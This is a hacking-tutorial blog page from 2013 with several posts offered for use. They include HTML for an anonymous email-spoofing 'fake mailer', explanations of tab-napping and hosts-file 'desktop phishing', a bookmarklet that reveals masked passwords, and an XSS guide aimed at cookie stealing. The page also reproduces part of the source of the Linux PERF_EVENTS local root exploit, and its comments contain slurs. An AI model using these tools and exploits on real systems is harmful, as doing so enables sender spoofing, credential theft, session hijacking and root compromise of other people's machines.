Skip to main content

Posts

Showing posts from June 16, 2013

fake mailer website

Hello friends today i m show you how to make  your own fake mailer website : you need a website for web hosting . you can use free web hosting like 110mb.com,www.5gbfree.com/etc. resistor for web hosting a create an account . next step   <html> <h1>Kyrion's Anonymous Email Mail Sender (For Educational Purpose Only)</h1> </html> <table border=2> <form action="" method=post> <tr><td>Recipent: </td><td><input type=text name=email size=30></td></tr> <tr><td>Sender name: </td><td><input type=text name=name size=30></td></tr> <tr><td>Sender Email Address: </td><td><input type=text name=sender size=30></td></tr> <tr><td>Subject: </td><td><input type=text name=subject size=30></td></tr> <tr><td>Content: </td><td><textarea rows=10 cols=30 name

Tab Napping:

Beware Of Tab Napping: Phishing Technique What is Tab Napping ? Tab napping is new type of phishing scam that does not require you to click on any URL to redirect you to the phishing site instead it relies on the fact that a lot of people used tabbed browsing(Opening multiple tabs while browsing).In tab napping one of your inactive tab is automatically replaced by with a new tab without your knowledge.For example one of your inactive tab in which you have opened your bank’s website will be automatically replaced with the phishing site of your bank and you will be asked to enter your Username and password.You might think you have been signed out or never logged in but when you will enter the details again it will be sent to the hacker. How To Detect And Protect Yourself From Tab Napping? Here are the simple and easy steps with which you can detect this new phishing technique “Tab Napping”. >> Don’t open another tab when your are working with your

Desktop phish

Desktop phish is advanced phishing not as simple phishing. How desktop phishing works? Now u understand from pic that how desktop phishing works. Old  phishing it for sending link then it works. While desktop phish u have to send a batch file which victim has to be run as admin, and then what ever original links r typed will automatically redirect to ur phish page, here phish page is your computer or ur phish page what you want. If you use your computer as server/site then it is 100% safe. Is it awsome? Hence i make tutorial for you all fanz of hackerzpositive. but, What is Host file? The hosts file is one of several system facilities that assists in addressing network nodes in a computer network. It is a common part of an operating system's Internet Protocol (IP) implementation, and serves the function of translating human-friendly hostnames into numeric protocol addresses, called IP addresses, that identify and locate a host in an IP network. In some operating system

How to view the password behind asterisk:

How to view the password behind asterisk: Many times we need to see hidden passwords behind asterisk symbols in MOZILLA FIREFOX and INTERNET EXPLORER , there exist a simple JavaScript hack to achieve this – simply copy-paste the below code snippet into your web browser address bar to see what’s inside the password field. Copy the next part onto the browser menu and see the hidden passwords in MOZILLA FIREFOX and INTERNET EXPLORER. javascript:(function(){vars,F,j,f,i;s="";F=d

Cross Site Scripting With Code:-

Cross Site Scripting With Code Here i am posting some usefull information XSS: Cross Site Scripting (abbrivated as XSS) is a web application vulnerability that allows attackers to execute external JavaScript and VBScript code on a web application. By taking the advantage of this, attacker can cause a web page to execute a malicious code on any user's browser. Most popular use of this attack is cookie stealing that can cause session hijacking. The malicious code could provide a hacker with full Read/Write access to browser cookies, browser history files, or even permit the download/installation of malware. How to find XSS in a website? XSS is performed as a form of user input. If a website does not filter and sanitize user input properly. To test a website, we will take each place in a website that accepts user input (such as search forms, login forms, profile forms etc.) Now enter the following codes one by one and see whether it shows a pop up box saying* 'XSS' or n

Linux PERF_EVENTS Local Root Exploit

 Linux PERF_EVENTS Local Root Linux local root exploit that requires that PERF_EVENTS be compiled into the kernel. This has been fixed in 3.8.10. This bug apparently got backported from 2.6.37 into CentOS5 2.6.32 kernels. Code: /** linux 2.6.37-3.x.x x86_64, ~100 LOC* gcc-4.6 -O2 semtex.c && ./a.out* 2010 sd@fucksheep.org, salut!** update may 2013:* seems like centos 2.6.32 backported the perf bug, lol.* jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.*/ #define _GNU_SOURCE 1#include <stdint.h>#include <stdint.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#include <unistd.h>#include <sys/mman.h>#include <syscall.h>#include <stdint.h>#include <assert.h> #define BASE  0x380000000#define SIZE  0x010000000#define KSIZE  0x2000000#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337)))) void fuck() {  int i,j,k;  uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };  uint8_t *curren

Hacking Onto College or Schools PC And Displaying Notice:-

                                            Displaying Notice:- 1)Start -> Run 2)Type regedit 3) Go to the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon 4) Create a new string value in the right pane named LegalNoticeCaption and enter the value that you want to see in the menubar 5) Create a new string value and name it LegalNoticeText. Modify it and insert the message you want to display each time Windows boots . .                                     Enjoy Hacking . . ..